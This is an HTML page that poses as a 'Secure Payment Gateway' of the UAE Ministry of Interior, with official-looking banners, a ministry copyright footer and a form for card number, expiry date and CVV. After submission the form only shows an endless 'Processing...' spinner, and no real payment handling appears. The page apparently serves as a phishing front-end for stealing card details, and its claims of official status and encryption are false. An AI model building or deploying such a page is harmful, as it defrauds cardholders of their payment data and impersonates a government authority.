<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>MOI UAE - Secure Payment Gateway</title>
    <style>
        body { font-family: 'Segoe UI', Tahoma, sans-serif; background-color: #f4f4f4; margin: 0; padding: 0; overflow-x: hidden; }
        
        /* الهيدر النصي المتصل - دوران لانهائي */
        .official-ticker { 
            background: #fff; border-bottom: 2px solid #c5a367; padding: 12px 0; 
            overflow: hidden; white-space: nowrap; position: relative; display: flex;
        }
        .ticker-wrapper { display: inline-block; white-space: nowrap; animation: scroll-left 35s linear infinite; }
        .ticker-text { display: inline-block; font-weight: bold; color: #c5a367; font-size: 14px; padding-right: 50px; }
        @keyframes scroll-left { 0% { transform: translateX(0); } 100% { transform: translateX(-50%); } }

        .container { max-width: 450px; margin: 30px auto; background: #fff; padding: 30px; border-radius: 15px; box-shadow: 0 10px 30px rgba(0,0,0,0.05); }
        .title { text-align: center; color: #222; font-size: 20px; margin-bottom: 25px; font-weight: bold; border-bottom: 2px solid #f9f9f9; padding-bottom: 15px; }
        
        .form-group { margin-bottom: 20px; text-align: left; position: relative; }
        label { display: block; margin-bottom: 8px; color: #666; font-size: 13px; font-weight: 600; }
        
        input { 
            width: 100%; padding: 15px; border: 1px solid #ddd; border-radius: 10px; 
            font-size: 16px; box-sizing: border-box; outline: none; transition: 0.3s; background: #fafafa;
        }
        input:focus { border-color: #c5a367; background: #fff; }
        
        /* تمييز الأخطاء */
        input.error-border { border: 2px solid #ff4d4d !important; background-color: #fff9f9; }
        .error-msg { color: #ff4d4d; font-size: 11px; margin-top: 5px; display: none; font-weight: bold; }

        .card-input-wrapper { position: relative; }
        #cardNum { padding-right: 50px; letter-spacing: 1px; }
        .brand-logo-inner { position: absolute; right: 12px; top: 50%; transform: translateY(-50%); width: 35px; display: none; z-index: 5; }

        .flex-inputs { display: flex; gap: 15px; }
        .flex-inputs div { flex: 1; }

        .btn-pay { width: 100%; padding: 18px; background-color: #c5a367; color: #fff; border: none; border-radius: 10px; font-size: 18px; font-weight: bold; cursor: pointer; margin-top: 10px; }

        /* طرق الدفع المقبولة */
        .accepted-payments { text-align: center; margin-top: 25px; border-top: 1px solid #eee; padding-top: 20px; }
        .accepted-title { font-size: 12px; color: #888; margin-bottom: 15px; font-weight: bold; text-transform: uppercase; }
        .payment-icons { display: flex; justify-content: center; align-items: center; gap: 15px; }
        .payment-icons img { height: 22px; }

        /* التذييل الرسمي */
        .official-footer { text-align: center; margin-top: 20px; padding: 20px; color: #999; font-size: 11px; line-height: 1.8; }
        .footer-links { margin-bottom: 10px; }
        .footer-links a { color: #c5a367; text-decoration: none; margin: 0 10px; font-weight: bold; }

        #full-loading { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: #fff; z-index: 9999; flex-direction: column; justify-content: center; align-items: center; }
        .spinner { border: 4px solid #f3f3f3; border-top: 4px solid #c5a367; border-radius: 50%; width: 50px; height: 50px; animation: spin 0.8s linear infinite; }
        @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
    </style>
</head>
<body>

<div class="official-ticker">
    <div class="ticker-wrapper">
        <span class="ticker-text">وزارة الداخلية الإماراتية - بوابة الدفع الآمن الموحدة • MOI UAE - SECURE PAYMENT GATEWAY • ALL TRANSACTIONS ARE ENCRYPTED •</span>
        <span class="ticker-text">وزارة الداخلية الإماراتية - بوابة الدفع الآمن الموحدة • MOI UAE - SECURE PAYMENT GATEWAY • ALL TRANSACTIONS ARE ENCRYPTED •</span>
    </div>
</div>

<div class="container" id="payment-page">
    <div class="title">Secure Payment Details</div>
    
    <div class="form-group">
        <label>Cardholder Name</label>
        <input type="text" id="cardName" placeholder="Full Name (Arabic or English)" 
               oninput="this.value = this.value.replace(/[0-9!@#$%^&*()_+\-=\[\]{};':\\|,.<>\/?]/g, '')">
    </div>

    <div class="form-group">
        <label>Card Number</label>
        <div class="card-input-wrapper">
            <input type="text" id="cardNum" placeholder="XXXX XXXX XXXX XXXX" maxlength="19">
            <img id="inner-brand" class="brand-logo-inner" src="" alt="">
        </div>
        <div id="card-error" class="error-msg">Invalid card number format</div>
    </div>

    <div class="flex-inputs">
        <div class="form-group">
            <label>Expiry Date</label>
            <input type="text" id="expDate" placeholder="MM/YY" maxlength="5">
            <div id="date-error" class="error-msg">Expired or invalid date</div>
        </div>
        <div class="form-group">
            <label>CVV</label>
            <input type="password" id="cvv" placeholder="***" maxlength="3">
        </div>
    </div>

    <button class="btn-pay" onclick="handlePayment()">Complete Secure Payment</button>

    <div class="accepted-payments">
        <div class="accepted-title">ACCEPTED PAYMENT METHODS</div>
        <div class="payment-icons">
            <img src="https://img.icons8.com/color/96/visa.png" alt="Visa">
            <img src="https://img.icons8.com/color/48/mastercard.png" alt="Master">
            <img src="https://img.icons8.com/color/96/apple-pay.png" alt="Apple">
            <img src="https://img.icons8.com/color/96/google-pay.png" alt="GPay">
        </div>
    </div>
</div>

<div class="official-footer">
    <div class="footer-links">
        <a href="#">Privacy Policy</a> | <a href="#">Terms & Conditions</a> | <a href="#">Contact Us</a>
    </div>
    <div>© 2026 Ministry of Interior - United Arab Emirates. All Rights Reserved.</div>
</div>

<div id="full-loading">
    <div class="spinner"></div>
    <h3 style="margin-top: 15px; color: #444;">Processing...</h3>
</div>

<script>
    function checkLuhn(n) {
        let s = 0;
        for (let i = 0; i < n.length; i++) {
            let v = parseInt(n[i]);
            if (i % 2 == n.length % 2) { v *= 2; if (v > 9) v -= 9; }
            s += v;
        }
        return s % 10 == 0;
    }

    document.getElementById('cardNum').addEventListener('input', function (e) {
        let v = e.target.value.replace(/\D/g, '');
        let logo = document.getElementById('inner-brand');
        
        // إعادة الحقل للوضع الطبيعي بمجرد المسح أو التغيير
        this.classList.remove('error-border');
        document.getElementById('card-error').style.display = 'none';

        if (v.startsWith('4')) { logo.src = 'https://img.icons8.com/color/48/visa.png'; logo.style.display = 'block'; }
        else if (v.startsWith('5')) { logo.src = 'https://img.icons8.com/color/48/mastercard.png'; logo.style.display = 'block'; }
        else { logo.style.display = 'none'; }
        
        e.target.value = v.replace(/(\d{4})(?=\d)/g, '$1 ').trim();
        
        // فحص الصحة فقط عند اكتمال الرقم
        if (v.length >= 16) {
            if (!checkLuhn(v)) { 
                this.classList.add('error-border'); 
                document.getElementById('card-error').style.display = 'block'; 
            }
        }
    });

    document.getElementById('expDate').addEventListener('input', function (e) {
        let v = e.target.value.replace(/\D/g, '');
        
        // إعادة الحقل للوضع الطبيعي عند التعديل
        this.classList.remove('error-border');
        document.getElementById('date-error').style.display = 'none';

        if (v.length >= 2) e.target.value = v.slice(0, 2) + '/' + v.slice(2, 4);
        
        if (v.length === 4) {
            let m = parseInt(v.slice(0, 2)), y = parseInt("20" + v.slice(2, 4));
            let d = new Date(), cy = d.getFullYear(), cm = d.getMonth() + 1;
            
            if (m > 12 || m < 1 || y < cy || (y === cy && m < cm)) {
                this.classList.add('error-border'); 
                document.getElementById('date-error').style.display = 'block';
            }
        }
    });

    function handlePayment() {
        const cardNumVal = document.getElementById('cardNum').value.replace(/\s/g, '');
        if (document.querySelectorAll('.error-border').length > 0 || cardNumVal.length < 16) {
            alert("Please verify card details."); return;
        }
        document.getElementById('payment-page').style.display = 'none';
        document.querySelector('.official-ticker').style.display = 'none';
        document.querySelector('.official-footer').style.display = 'none';
        document.getElementById('full-loading').style.display = 'flex';
    }
</script>
</body>
</html>
